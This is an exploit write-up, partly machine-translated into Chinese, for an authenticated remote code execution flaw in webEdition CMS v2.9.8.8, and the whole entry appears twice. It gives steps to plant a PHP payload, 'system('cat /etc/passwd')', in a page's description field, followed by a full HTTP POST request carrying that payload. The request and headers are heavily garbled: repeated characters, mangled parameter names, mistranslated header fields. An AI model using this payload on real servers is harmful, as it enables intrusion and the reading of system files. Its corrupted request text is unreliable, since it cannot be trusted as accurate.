exploit title:网络培训CMS v2.9.8.8-远程代码执行(RCE)
Application:网络介绍CMS
版本: v2.9.8.8
BUGS: RCE
Technology: php
供应商url: https://www.webedition.org/
软件link: https://download.webedition.org/releases/onlinestaller.tgz?p=1
发现日期: 03.08.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
步骤
1。登录帐户
2。转到新的- 网络培训页面- 空页面
3。选择php
4。设置为'?php echo系统('cat /etc /passwd');描述区域
POC请求:
post/webedition/we_cmd.php?we_cmd [0]=switch_edit_pagewe_cmd [1]=0we_cmd [2]=4FD880C06DF5A590754CE5B8738CD0DD0DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDP/1.1
HOST: LOCALHOST
内容长度: 1621
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-platform:''
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:应用程序/x-www-form-urlenceded
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-dest: iframe
Refureer: http://localhost/webedition/we_cmd.php?
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: treewidth_main=300; Wesession=E781790F1D79DDAF9E3A0A4E4EB42E55B04496A569; cookie=yep; treewidth_main=300
连接:关闭
we_transaction=4FD880C06DF5A590754CE5B8738CD0DWE_003BE03B474A5C25132D388906FB4AE_FILENAE=POCWE_0 03BE03B474A5C25132D388906FB4AE_EXTENSION=.PHPWETMP_WE_003BE03B474A5C25132D388906FB4AEE_EXTEND=w E_003BE03B474A5C25132D388906FB4AE_PARENTPATH=%2FWE_003BE03BE03BB474A5C25132D388906FB4AE_PARENTID=0YUIA ccontenttypeparentpath=WE_003BE03B474A5C25132D388906FB4AE_DOCTYPE=WE_003BE03B474A5C25132D388906FB 4AE_TEMPLATENAME=%2FWE_003BE03B474A5C25132D388906FB4AE_TEMPLATEID=YUIACCONCTENTTYPETEMPLATE=WE_003B E033B474A5C25132D388906FB4AE_ISDYNAMIC=0WE_003BE03BE03B474A5C25132D388906FB4EAE_ISSERACHBEL=0WE_003BE0 33B474A5C25132D388906FB4AE_INGLOSSAR=0WE_003BE03BE03BB474A5C25132D388906FB4AE_TXT%5Btitle%5Btitle%5D=ASDFWE_003 BE033B474A5C25132D388906FB4AE_TXT%5BDESCRIPTION%5D=%22%3E%3C%3C%3FPHP+ECHO+SYSTEM%28%22CAT+%22CAT+%2FETC%2FPAS SWD%22%29%3B%3F%3EWE_003BE03B474AA5C25132D388906FB4AE_TXT%5BKeyWords%5D=ASDFOLD%5B0%5D%5D=0fold_named %5BPROPERTYPAGE_3%5D=0WE_003BE03B474A5C25132D388906FB4AE_LANGUAGE=EN_GBWE_003BE03B474A5C25132D388 906FB4AE_LAGUAGEDOCNAME%5BDE_DE%5D=WE_003BE03B474A5C25132D388906FB4EAE_LAGINAGEICID%5BDE_DE_DE%5D=YU IACCONTTYPELAGINAGEDOCDEDE=WE_003BE03B474A5C25132D388906FB4AE_LAGYAGEDOCNAME%5BEN_GB%5D=WE_003B E033B474A5C25132D388906FB4AE_LAGINAGEAGEDOCID%5BEN_GB%5D=YuiAcconconConcentTypeLanguigedOcengb=fold%5B1%5D=0 f=0fol D_Named%5BPROPERTYPAGE_4%5D=0WE_003BE03B474A5C25132D388906FB4AE_COPYID=0 fold%5B2%5D=0fold_named_named %5BPROPERTYPAGE_6%5D=0WETMP_003BE03B474A5C25132D388906FB4AE_CREATORID=%2fadminwe_003be033b47474a5c25 132D388906FB4AE_CREATORID=1WE_003BE03B474A5C25132D388906FB4EAE_RESTERTICTONTERS=0WE_COMPLETE_REQUEST_REQUEST_REQUEST=1
Application:网络介绍CMS
版本: v2.9.8.8
BUGS: RCE
Technology: php
供应商url: https://www.webedition.org/
软件link: https://download.webedition.org/releases/onlinestaller.tgz?p=1
发现日期: 03.08.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
步骤
1。登录帐户
2。转到新的- 网络培训页面- 空页面
3。选择php
4。设置为'?php echo系统('cat /etc /passwd');描述区域
POC请求:
post/webedition/we_cmd.php?we_cmd [0]=switch_edit_pagewe_cmd [1]=0we_cmd [2]=4FD880C06DF5A590754CE5B8738CD0DD0DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDP/1.1
HOST: LOCALHOST
内容长度: 1621
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-platform:''
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:应用程序/x-www-form-urlenceded
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-dest: iframe
Refureer: http://localhost/webedition/we_cmd.php?
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: treewidth_main=300; Wesession=E781790F1D79DDAF9E3A0A4E4EB42E55B04496A569; cookie=yep; treewidth_main=300
连接:关闭
we_transaction=4FD880C06DF5A590754CE5B8738CD0DWE_003BE03B474A5C25132D388906FB4AE_FILENAE=POCWE_0 03BE03B474A5C25132D388906FB4AE_EXTENSION=.PHPWETMP_WE_003BE03B474A5C25132D388906FB4AEE_EXTEND=w E_003BE03B474A5C25132D388906FB4AE_PARENTPATH=%2FWE_003BE03BE03BB474A5C25132D388906FB4AE_PARENTID=0YUIA ccontenttypeparentpath=WE_003BE03B474A5C25132D388906FB4AE_DOCTYPE=WE_003BE03B474A5C25132D388906FB 4AE_TEMPLATENAME=%2FWE_003BE03B474A5C25132D388906FB4AE_TEMPLATEID=YUIACCONCTENTTYPETEMPLATE=WE_003B E033B474A5C25132D388906FB4AE_ISDYNAMIC=0WE_003BE03BE03B474A5C25132D388906FB4EAE_ISSERACHBEL=0WE_003BE0 33B474A5C25132D388906FB4AE_INGLOSSAR=0WE_003BE03BE03BB474A5C25132D388906FB4AE_TXT%5Btitle%5Btitle%5D=ASDFWE_003 BE033B474A5C25132D388906FB4AE_TXT%5BDESCRIPTION%5D=%22%3E%3C%3C%3FPHP+ECHO+SYSTEM%28%22CAT+%22CAT+%2FETC%2FPAS SWD%22%29%3B%3F%3EWE_003BE03B474AA5C25132D388906FB4AE_TXT%5BKeyWords%5D=ASDFOLD%5B0%5D%5D=0fold_named %5BPROPERTYPAGE_3%5D=0WE_003BE03B474A5C25132D388906FB4AE_LANGUAGE=EN_GBWE_003BE03B474A5C25132D388 906FB4AE_LAGUAGEDOCNAME%5BDE_DE%5D=WE_003BE03B474A5C25132D388906FB4EAE_LAGINAGEICID%5BDE_DE_DE%5D=YU IACCONTTYPELAGINAGEDOCDEDE=WE_003BE03B474A5C25132D388906FB4AE_LAGYAGEDOCNAME%5BEN_GB%5D=WE_003B E033B474A5C25132D388906FB4AE_LAGINAGEAGEDOCID%5BEN_GB%5D=YuiAcconconConcentTypeLanguigedOcengb=fold%5B1%5D=0 f=0fol D_Named%5BPROPERTYPAGE_4%5D=0WE_003BE03B474A5C25132D388906FB4AE_COPYID=0 fold%5B2%5D=0fold_named_named %5BPROPERTYPAGE_6%5D=0WETMP_003BE03B474A5C25132D388906FB4AE_CREATORID=%2fadminwe_003be033b47474a5c25 132D388906FB4AE_CREATORID=1WE_003BE03B474A5C25132D388906FB4EAE_RESTERTICTONTERS=0WE_COMPLETE_REQUEST_REQUEST_REQUEST=1
